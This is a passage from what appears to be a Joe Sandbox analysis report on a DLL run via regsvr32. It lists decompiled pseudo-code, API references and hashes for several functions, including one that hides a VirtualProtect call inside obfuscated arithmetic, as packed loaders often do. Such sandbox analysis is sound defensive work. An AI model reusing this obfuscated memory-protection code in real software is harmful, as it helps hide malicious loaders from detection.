                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateCriticalEnterHeapSection__lock
                                                                        • String ID:
                                                                        • API String ID: 409319249-0
                                                                        • Opcode ID: 50d20e50f01447f42db1d42bb29e4d21c1024c3df395ccd2c9c31703fcb81017
                                                                        • Instruction ID: 42b023ab18c65cc465c375f16582ad1359b716bf9f3aedd515ba29da9f54a78b
                                                                        • Opcode Fuzzy Hash: 50d20e50f01447f42db1d42bb29e4d21c1024c3df395ccd2c9c31703fcb81017
                                                                        • Instruction Fuzzy Hash: 1DF06D75E45665ABEB10EB708C4AB8D7BB4FB003A1F150114F9A1AE1E1D7B0BAC08E95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10013A83 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 247 10013a83-10013aa1 HeapCreate 248 10013aa3-10013ab0 call 10013a69 247->248 249 10013acd-10013acf 247->249 252 10013ad0-10013ad3 248->252 253 10013ab2-10013abf call 10013b53 248->253 253->252 256 10013ac1-10013ac7 HeapDestroy 253->256 256->249
                                                                        C-Code - Quality: 100%
                                                                        			E10013A83(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10050a60 = _t6;
				if(_t6 == 0) {
					L4:
					return 0;
				} else {
					_t8 = E10013A69();
					 *0x10050a64 = _t8;
					if(_t8 != 3 || E10013B53(0x3f8) != 0) {
						return 1;
					} else {
						HeapDestroy( *0x10050a60);
						goto L4;
					}
				}
			}





                                                                        0x10013a94
                                                                        0x10013a9c
                                                                        0x10013aa1
                                                                        0x10013acd
                                                                        0x10013acf
                                                                        0x10013aa3
                                                                        0x10013aa3
                                                                        0x10013aab
                                                                        0x10013ab0
                                                                        0x10013ad3
                                                                        0x10013ac1
                                                                        0x10013ac7
                                                                        0x00000000
                                                                        0x10013ac7
                                                                        0x10013ab0

                                                                        APIs
                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,10011217,00000001,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013A94
                                                                          • Part of subcall function 10013B53: HeapAlloc.KERNEL32(00000000,00000140,10013ABC,000003F8,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B60
                                                                        • HeapDestroy.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013AC7
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocCreateDestroy
                                                                        • String ID:
                                                                        • API String ID: 2236781399-0
                                                                        • Opcode ID: f6a2f7532e9ba5cb0f586e1f719da1c5d5a79765111272051b74937e09fd73f5
                                                                        • Instruction ID: e8a57e519fdf56151fc66cac883b31846c607769bf618c359d49edee3f1857a7
                                                                        • Opcode Fuzzy Hash: f6a2f7532e9ba5cb0f586e1f719da1c5d5a79765111272051b74937e09fd73f5
                                                                        • Instruction Fuzzy Hash: 6BE01A74A953559EEB01EB718C45B1A37E4EB44682F488829F442CD4A1EB70D680A602
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10003310 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 257 10003310-10003320 258 10003322-1000332a 257->258 259 1000332b-10003374 257->259 260 100033fa-100034e1 259->260 261 1000337a-10003387 259->261 264 10003500-1000356c VirtualProtect 260->264 265 100034e3-100034fc 260->265 262 10003389-1000338e 261->262 263 100033ed-100033f9 261->263 266 10003390-1000339c 262->266 267 100033cd-100033ea 262->267 265->264 266->267 268 1000339e-100033cb 266->268 267->263 268->263 268->267
                                                                        C-Code - Quality: 89%
                                                                        			E10003310() {
				long _t80;
				signed int _t83;
				signed int _t87;
				intOrPtr _t91;
				signed int _t101;
				signed int _t116;
				signed int _t122;
				intOrPtr _t126;
				signed int _t127;
				signed int _t132;
				signed int _t135;
				intOrPtr* _t137;
				intOrPtr* _t141;
				signed int _t150;
				signed int _t158;
				signed int _t165;
				signed int _t175;
				signed int _t186;
				signed int _t216;
				signed int _t223;
				signed int _t227;
				intOrPtr _t235;
				signed int _t238;
				void* _t239;

				_t80 =  *(_t239 + 0x18);
				_t126 =  *((intOrPtr*)(_t80 + 8));
				 *((intOrPtr*)(_t239 + 8)) = _t126;
				if(_t126 != 0) {
					_t132 =  *(_t80 + 0xc);
					_t127 =  *0x1004b0dc; // 0x0
					_t5 = _t127 + 1; // 0x1
					_t101 =  *0x1004b0ec; // 0x0
					_t165 =  *0x1004b0e0; // 0x0
					_t7 = _t165 + 0x1000000; // 0x1000000
					_t83 =  *0x1004b0e4; // 0x0
					_t150 =  *0x1004b0d8; // 0x0
					 *(_t239 + 0x10) = _t132;
					if((_t132 & _t83 * 0x7fffffff + _t165 + _t7 - _t5 * _t127 + _t101 + _t150 << 0x00000001) == 0) {
						_t35 = _t83 * _t165 + 1; // 0x1
						 *(_t239 + 0x1c) = _t83 * _t165;
						_t135 =  *0x1004b0e8; // 0x0
						asm("sbb ebp, ebp");
						asm("sbb edi, edi");
						_t216 =  *0x1004b0d8; // 0x0
						_t223 =  *0x1004b0d8; // 0x0
						asm("sbb esi, esi");
						_t158 =  *0x1004b0ec; // 0x0
						 *(_t239 + 0x14) =  *(0x1004b0f4 + ( ~( ~(_t135 * 0x7fffffff + (0x00000001 - _t135) * _t83 * _t165 +  *0x1004b0d8 + ((0x00000001 - _t216) * _t127 - _t83) * _t127 + _t135 * 0x7fffffff + (0x00000001 - _t135) * _t83 * _t165 +  *0x1004b0d8 + ((0x00000001 - _t216) * _t127 - _t83) * _t127 - 0x80000000 &  *(_t239 + 0x10))) + ( ~( ~(0x40000000 + ((_t35 * 0x3fffffff + _t135) * _t127 + (_t135 * _t165 + 0x00000001) * _t150) * 0x00000004 &  *(_t239 + 0x10))) +  ~( ~(_t150 + _t135 * 0x00000002 + _t135 + _t150 + _t135 * 0x00000002 + _t135 + 0x20000000 &  *(_t239 + 0x10))) * 2) * 2) * 4);
						_t175 =  *0x1004b0e0; // 0x0
						_t116 = _t158 * _t127;
						if(( *(_t239 + 0x10) & (_t116 * _t127 + _t116 * _t127 * 0x00000002 - 0x00000006) * _t127 + _t175 + _t175 - _t135 - _t158 + _t83 + _t223 + (_t175 + _t175 - _t135 - _t158 + _t83 + _t223) * 0x00000002 + 0x04000000) != 0) {
							 *(_t239 + 0x14) =  *(_t239 + 0x14) | _t158 * _t83 *  *0x1004b0e0 + 0x00000200 + _t158 * _t83 *  *0x1004b0e0 * 0x00000002;
						}
						_t186 =  *0x1004b0e0; // 0x0
						_t227 = _t158 * 0x3fffffff;
						_t122 =  *0x1004b0d8; // 0x0
						_t74 = _t227 + 1; // 0x1
						_t87 = VirtualProtect( *( *(_t239 + 0x30)),  *((intOrPtr*)(_t239 + 0x20)) + (_t83 * 0x3fffffff + (_t122 + _t74) * _t186 + _t122 + (2 -  *((intOrPtr*)(_t239 + 0x24)) - _t135 - _t158) * _t127) * 4,  *(_t239 + 0x18), _t239 + 0x28 + ((_t116 + _t135) * _t158 + _t186) * 8); // executed
						asm("sbb eax, eax");
						return  ~( ~_t87);
					} else {
						_t137 =  *((intOrPtr*)(_t239 + 0x28));
						_t235 =  *_t137;
						 *((intOrPtr*)(_t239 + 0x28)) = _t235;
						if(_t235 ==  *((intOrPtr*)(_t137 + 4))) {
							if( *((intOrPtr*)(_t137 + 0x10)) != 0) {
								L7:
								_t91 =  *((intOrPtr*)(_t239 + 0x24));
								 *((intOrPtr*)(_t91 + 0x20))( *(_t239 + 0x30),  *(_t239 + 0x1c), 0x4000 - _t101,  *((intOrPtr*)(_t91 + 0x34)));
							} else {
								_t141 =  *((intOrPtr*)(_t239 + 0x24));
								_t238 =  *(_t141 + 0x3c);
								if( *((intOrPtr*)( *_t141 + 0x38)) == _t238 || (_t150 + 2) * _t101 + _t83 + _t165 * 2 + ((_t150 + 2) * _t101 + _t83 + _t165 * 2) * 2 - (_t83 * _t127 * _t127 + 3 + _t83 * _t127 * _t127 * 2) *  *0x1004b0e8 +  *(_t239 + 0x18) % _t238 == 0) {
									goto L7;
								}
							}
						}
						return 1;
					}
				} else {
					return 1;
				}
			}



























                                                                        0x10003313
                                                                        0x10003317
                                                                        0x1000331c
                                                                        0x10003320
                                                                        0x1000332b
                                                                        0x1000332e
                                                                        0x10003334
                                                                        0x1000333b
                                                                        0x10003343
                                                                        0x1000334a
                                                                        0x10003353
                                                                        0x10003364
                                                                        0x10003370
                                                                        0x10003374
                                                                        0x100033ff
                                                                        0x10003408
                                                                        0x1000340c
                                                                        0x10003433
                                                                        0x10003447
                                                                        0x1000344f
                                                                        0x10003492
                                                                        0x10003498
                                                                        0x100034a6
                                                                        0x100034ac
                                                                        0x100034b0
                                                                        0x100034be
                                                                        0x100034e1
                                                                        0x100034fc
                                                                        0x100034fc
                                                                        0x10003500
                                                                        0x10003515
                                                                        0x10003525
                                                                        0x1000352b
                                                                        0x10003559
                                                                        0x10003563
                                                                        0x1000356c
                                                                        0x1000337a
                                                                        0x1000337a
                                                                        0x1000337e
                                                                        0x10003383
                                                                        0x10003387
                                                                        0x1000338e
                                                                        0x100033cd
                                                                        0x100033cd
                                                                        0x100033e7
                                                                        0x10003390
                                                                        0x10003390
                                                                        0x10003394
                                                                        0x1000339c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000339c
                                                                        0x1000338e
                                                                        0x100033f9
                                                                        0x100033f9
                                                                        0x10003322
                                                                        0x1000332a
                                                                        0x1000332a

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f94f5a31096f78052b225d6198edabbe45c52cabc43602b45e44eff5801c83ed
                                                                        • Instruction ID: 1dc449bc3d80b5784a3a7ae21000a0fc3896a9c870339c3573936ee24331a343
                                                                        • Opcode Fuzzy Hash: f94f5a31096f78052b225d6198edabbe45c52cabc43602b45e44eff5801c83ed
                                                                        • Instruction Fuzzy Hash: 1A7129335043298FD314DF58C9C1646B7E9FB89310F058A2EDD699B3A5E670FE098AC4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10037855 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 270 10037855-10037867 call 10011bf0 273 10037897-100378a8 call 10037552 270->273 274 10037869-10037871 270->274 283 100378aa-100378b8 call 10037732 273->283 284 100378bd-100378cc 273->284 275 10037873-1003788a call 1003768d 274->275 276 10037890 call 10037446 274->276 275->276 282 10037895 276->282 282->273 283->284
                                                                        C-Code - Quality: 94%
                                                                        			E10037855(intOrPtr* __ecx) {
				intOrPtr _t12;
				intOrPtr _t14;
				signed char* _t15;
				long* _t17;
				long* _t19;
				intOrPtr _t23;
				intOrPtr* _t26;
				void* _t28;

				E10011BF0(0x1003aa13, _t28);
				_push(__ecx);
				_t26 = __ecx;
				if( *__ecx == 0) {
					_t20 =  *0x1004eff0; // 0x1004eff4
					if(_t20 == 0) {
						 *((intOrPtr*)(_t28 - 0x10)) = 0x1004eff4;
						 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
						_t15 = E1003768D(0x1004eff4);
						 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
						_t20 = _t15;
						 *0x1004eff0 = _t15; // executed
					}
					_t14 = E10037446(_t20); // executed
					 *_t26 = _t14;
				}
				_t17 =  *0x1004eff0; // 0x1004eff4
				_t23 = E10037552(_t17,  *_t26);
				if(_t23 == 0) {
					_t12 =  *((intOrPtr*)(_t28 + 8))();
					_t19 =  *0x1004eff0; // 0x1004eff4
					_t23 = _t12;
					E10037732(_t19,  *_t26, _t23);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return _t23;
			}











                                                                        0x1003785a
                                                                        0x1003785f
                                                                        0x10037861
                                                                        0x10037867
                                                                        0x10037869
                                                                        0x10037871
                                                                        0x10037878
                                                                        0x1003787b
                                                                        0x1003787f
                                                                        0x10037884
                                                                        0x10037888
                                                                        0x1003788a
                                                                        0x1003788a
                                                                        0x10037890
                                                                        0x10037895
                                                                        0x10037895
                                                                        0x10037899
                                                                        0x100378a4
                                                                        0x100378a8
                                                                        0x100378aa
                                                                        0x100378ad
                                                                        0x100378b3
                                                                        0x100378b8
                                                                        0x100378b8
                                                                        0x100378c4
                                                                        0x100378cc

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 1003785A
                                                                          • Part of subcall function 1003768D: TlsAlloc.KERNEL32(?,10037884,?,?,?,100373C4,100347FD,100071DC), ref: 100376AF
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocH_prolog
                                                                        • String ID:
                                                                        • API String ID: 3910492588-0
                                                                        • Opcode ID: afc1abf3d35d6b52cdf0f25188e220ecb9e5087980f930720a4386ab5437719b
                                                                        • Instruction ID: 4636a69bf69d573d2e706337ed3b04a464365e57385db0f45bc25e4442f629a4
                                                                        • Opcode Fuzzy Hash: afc1abf3d35d6b52cdf0f25188e220ecb9e5087980f930720a4386ab5437719b
                                                                        • Instruction Fuzzy Hash: 80018B396001A29FE72ACF18C851B6D77A2FB81362F10053EE996DB290DB349C00CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100045D0 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 287 100045d0-100045ea VirtualAlloc
                                                                        C-Code - Quality: 100%
                                                                        			E100045D0(void* _a4, long _a8, long _a12, long _a16) {
				void* _t7;

				_t7 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t7;
			}




                                                                        0x100045e4
                                                                        0x100045ea

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 100045E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 79d8040eb94a772a3858464c411fe2626b1031866cac9e3cc93b0a28150a8e2a
                                                                        • Instruction ID: c6cc4055dfec23ff58d81a81712461c79eda0eebf3d1de213efbbce8f3264bb9
                                                                        • Opcode Fuzzy Hash: 79d8040eb94a772a3858464c411fe2626b1031866cac9e3cc93b0a28150a8e2a
                                                                        • Instruction Fuzzy Hash: FCC0EAB9608201AF9A04DB54C988C6BB7E9EBC8641F008909B59983210D630E8408B22
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100045F0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 288 100045f0-10004605 VirtualFree
                                                                        C-Code - Quality: 100%
                                                                        			E100045F0(void* _a4, long _a8, long _a12) {
				int _t5;

				_t5 = VirtualFree(_a4, _a8, _a12); // executed
				return _t5;
			}




                                                                        0x100045ff
                                                                        0x10004605

                                                                        APIs
                                                                        • VirtualFree.KERNELBASE(?,?,?), ref: 100045FF
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: FreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 1263568516-0
                                                                        • Opcode ID: 174df1bf701f566af763c199529526010cd62a485baa78f61ffb0b3445841b2f
                                                                        • Instruction ID: 188741ce2ee140a107eafa4ec0cdb16d021ba485332012740db5241ef1f15393
                                                                        • Opcode Fuzzy Hash: 174df1bf701f566af763c199529526010cd62a485baa78f61ffb0b3445841b2f
                                                                        • Instruction Fuzzy Hash: D3C048B9218201BFEA04DB50CA88C2BB7A9EBC8A11F00C90DB88983210C630EC00DA22
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 1002592C Relevance: 15.1, APIs: 10, Instructions: 102stringfileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1002592C(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t33;
				long _t35;
				intOrPtr* _t36;
				void* _t43;
				void* _t49;
				CHAR* _t69;
				void* _t74;
				void* _t76;

				E10011BF0(0x1003acd2, _t76);
				_t33 =  *0x1004c470; // 0x303bb91f
				_t69 =  *(_t76 + 8);
				 *((intOrPtr*)(_t76 - 0x10)) = _t33;
				_t35 = GetFullPathNameA( *(_t76 + 0xc), 0x104, _t69, _t76 - 0x154);
				if(_t35 != 0) {
					if(_t35 < 0x104) {
						_t36 = E100243B2();
						_t67 =  *_t36;
						 *(_t76 + 8) =  *((intOrPtr*)( *_t36 + 0xc))() + 0x10;
						 *((intOrPtr*)(_t76 - 4)) = 0;
						E100258EA(0, _t69, _t76 + 8);
						if(PathIsUNCA( *(_t76 + 8)) != 0) {
							L15:
							_t74 = 1;
						} else {
							if(GetVolumeInformationA( *(_t76 + 8), 0, 0, 0, _t76 - 0x15c, _t76 - 0x158, 0, 0) != 0) {
								if(( *(_t76 - 0x158) & 0x00000002) == 0) {
									CharUpperA(_t69);
								}
								if(( *(_t76 - 0x158) & 0x00000004) != 0) {
									goto L15;
								} else {
									_t49 = FindFirstFileA( *(_t76 + 0xc), _t76 - 0x150);
									if(_t49 == 0xffffffff) {
										goto L15;
									} else {
										FindClose(_t49);
										if( *(_t76 - 0x154) == 0 ||  *(_t76 - 0x154) <= _t69 || lstrlenA(_t76 - 0x124) - _t69 +  *(_t76 - 0x154) >= 0x104) {
											goto L6;
										} else {
											lstrcpyA( *(_t76 - 0x154), _t76 - 0x124);
											goto L15;
										}
									}
								}
							} else {
								L6:
								_t74 = 0;
							}
						}
						E100014B0( &(( *(_t76 + 8))[0xfffffffffffffff0]), _t67);
						_t43 = _t74;
					} else {
						goto L3;
					}
				} else {
					lstrcpynA(_t69,  *(_t76 + 0xc), 0x104);
					L3:
					_t43 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return E100117AE(_t43,  *((intOrPtr*)(_t76 - 0x10)));
			}











                                                                        0x10025931
                                                                        0x1002593c
                                                                        0x10025944
                                                                        0x10025947
                                                                        0x1002595b
                                                                        0x10025965
                                                                        0x10025976
                                                                        0x1002597f
                                                                        0x10025984
                                                                        0x1002598e
                                                                        0x10025996
                                                                        0x10025999
                                                                        0x100259a9
                                                                        0x10025a44
                                                                        0x10025a46
                                                                        0x100259af
                                                                        0x100259cd
                                                                        0x100259da
                                                                        0x100259dd
                                                                        0x100259dd
                                                                        0x100259ea
                                                                        0x00000000
                                                                        0x100259ec
                                                                        0x100259f6
                                                                        0x100259ff
                                                                        0x00000000
                                                                        0x10025a01
                                                                        0x10025a02
                                                                        0x10025a0e
                                                                        0x00000000
                                                                        0x10025a31
                                                                        0x10025a3e
                                                                        0x00000000
                                                                        0x10025a3e
                                                                        0x10025a0e
                                                                        0x100259ff
                                                                        0x100259cf
                                                                        0x100259cf
                                                                        0x100259cf
                                                                        0x100259cf
                                                                        0x100259cd
                                                                        0x10025a4d
                                                                        0x10025a52
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10025967
                                                                        0x1002596c
                                                                        0x10025978
                                                                        0x10025978
                                                                        0x10025978
                                                                        0x10025a59
                                                                        0x10025a6a

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10025931
                                                                        • GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
                                                                        • lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C
                                                                          • Part of subcall function 100258EA: lstrcpynA.KERNEL32(00000000,?,00000104), ref: 1002590F
                                                                          • Part of subcall function 100258EA: PathStripToRootA.SHLWAPI(00000000), ref: 10025916
                                                                        • PathIsUNCA.SHLWAPI(?,?,?), ref: 100259A1
                                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 100259C5
                                                                        • CharUpperA.USER32(?), ref: 100259DD
                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 100259F6
                                                                        • FindClose.KERNEL32(00000000), ref: 10025A02
                                                                        • lstrlenA.KERNEL32(?), ref: 10025A1F
                                                                        • lstrcpyA.KERNEL32(?,?), ref: 10025A3E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
                                                                        • String ID:
                                                                        • API String ID: 4080879615-0
                                                                        • Opcode ID: 0ef6f2e99765fa8eebebeb34d5511f989af001345e8d2ce3599a936882c97ade
                                                                        • Instruction ID: 1fd06765c8897f0dc9d05cfa7245a04573121f8266c58d07b0a106865c59afd7
                                                                        • Opcode Fuzzy Hash: 0ef6f2e99765fa8eebebeb34d5511f989af001345e8d2ce3599a936882c97ade
                                                                        • Instruction Fuzzy Hash: E531B271900168EFDB11CFA0DC88EEEBBBCEF45396F404266F406DA151D7319E848B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002FE1B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 164keyboardtimeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 81%
                                                                        			E1002FE1B(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				struct tagPOINT _v28;
				intOrPtr _v40;
				signed char _v69;
				char _v76;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t62;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t77;
				short _t78;
				short _t85;
				short _t90;
				intOrPtr _t109;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr* _t116;

				_t113 = _a4;
				_t116 = __ecx;
				if(E10020B0B(__ecx, _t113) != 0) {
					L37:
					return 1;
				}
				_t114 =  *((intOrPtr*)(_t113 + 4));
				_v20 = E10008325(__ecx);
				if(( *(__ecx + 0x7c) & 0x00000020) != 0 || _t114 == 0x201 || _t114 == 0x202) {
					if(_t114 < 0x200 || _t114 > 0x209) {
						if(_t114 < 0xa0 || _t114 > 0xa9) {
							goto L30;
						} else {
							goto L8;
						}
					} else {
						L8:
						_v16 = E100373DB();
						_t70 = _a4;
						_v28.y =  *((intOrPtr*)(_t70 + 0x18));
						_v28.x =  *(_t70 + 0x14);
						ScreenToClient( *(_t116 + 0x1c),  &_v28);
						E10011C50( &_v76, 0, 0x30);
						_v76 = 0x28;
						_t77 =  *((intOrPtr*)( *_t116 + 0x6c))(_v28.x, _v28.y,  &_v76);
						_t128 = _v40 - 0xffffffff;
						_v8 = _t77;
						if(_v40 != 0xffffffff) {
							_push(_v40);
							E100107C8(0x201, _t114, _t116, _t128);
						}
						if(_t114 != 0x201 || (_v69 & 0x00000080) == 0) {
							_v12 = _v12 & 0x00000000;
							__eflags = _t114 - 0x201;
							if(_t114 != 0x201) {
								_t90 = GetKeyState(1);
								__eflags = _t90;
								if(_t90 < 0) {
									_v8 =  *((intOrPtr*)(_v16 + 0x78));
								}
							}
						} else {
							_v12 = 1;
						}
						if(_v8 < 0 || _v12 != 0) {
							_t78 = GetKeyState(1);
							__eflags = _t78;
							if(_t78 >= 0) {
								L28:
								 *((intOrPtr*)( *_t116 + 0x160))(0xffffffff);
								KillTimer( *(_t116 + 0x1c), 0xe001);
								goto L29;
							}
							__eflags = _v12;
							if(_v12 == 0) {
								goto L29;
							}
							goto L28;
						} else {
							if(_t114 != 0x202) {
								__eflags =  *(_t116 + 0x78) & 0x00000008;
								if(( *(_t116 + 0x78) & 0x00000008) != 0) {
									L25:
									 *((intOrPtr*)( *_t116 + 0x160))(_v8);
									L29:
									 *((intOrPtr*)(_v16 + 0x78)) = _v8;
									goto L30;
								}
								_t85 = GetKeyState(1);
								__eflags = _t85;
								if(_t85 < 0) {
									goto L25;
								}
								_t109 = _v16;
								__eflags = _v8 -  *((intOrPtr*)(_t109 + 0x78));
								if(_v8 ==  *((intOrPtr*)(_t109 + 0x78))) {
									goto L29;
								}
								_push(0x12c);
								_push(0xe000);
								L24:
								E1002F4CC(_t116);
